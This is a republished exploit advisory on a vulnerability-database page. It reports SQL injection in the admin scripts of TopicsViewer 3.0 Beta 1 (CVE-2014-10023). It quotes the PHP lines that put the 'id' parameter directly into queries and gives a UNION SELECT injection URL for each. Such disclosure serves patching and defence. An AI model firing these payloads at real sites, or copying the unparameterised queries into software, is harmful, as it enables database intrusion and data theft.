TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-2014-10023 | 13 Jan 201511:00 | – | cve | |
| CVE-2014-10023 | 13 Jan 201511:00 | – | cvelist | |
| EUVD-2014-1095 | 7 Oct 202500:30 | – | euvd | |
| CVE-2014-10023 | 13 Jan 201511:59 | – | nvd | |
| Sql injection | 13 Jan 201511:59 | – | prion |
TopicsViewer v3.0 Beta 1 - Multiple Sql Injection Vulnerabilty
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [[email protected]] , [[email protected]]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.topicsviewer.com/
####################################################################
Multiple Sql Injection
======================
VULNERABILITY
##############
[I] /admincp/edit_block.php (line 46-48)
$sql_b_e = "select * from blocks where b_id = $_GET[id] ";
$result_b_e = @mysql_query ($sql_b_e);
$block = @mysql_fetch_array ($result_b_e);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_block.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10
VULNERABILITY
##############
[II] /admincp/edit_cat.php (line 77-79)
$sql = "select * from cat where c_id = $_GET[id]";
$result = @mysql_query ($sql);
$cat= @mysql_fetch_array ($result);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_cat.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8
VULNERABILITY
##############
[III] /admincp/edit_note.php (line 77-79)
$sql = "select * from cat where c_id = $_GET[id]";
$result = @mysql_query ($sql);
$cat= @mysql_fetch_array ($result);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_note.php?id=1+and+1=2+union+select+1,version(),3,4,5
VULNERABILITY
##############
[V] /admincp/rmv_topic.php (line 46-47)
$sql = "select * from topics where t_id = $_GET[id] LIMIT 1 ;";
$result = @mysql_query ($sql);
#########
EXPLOIT
#########
localhost/Path/admincp/rmv_topic.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14
####################################################################Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Feb 2014 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.03276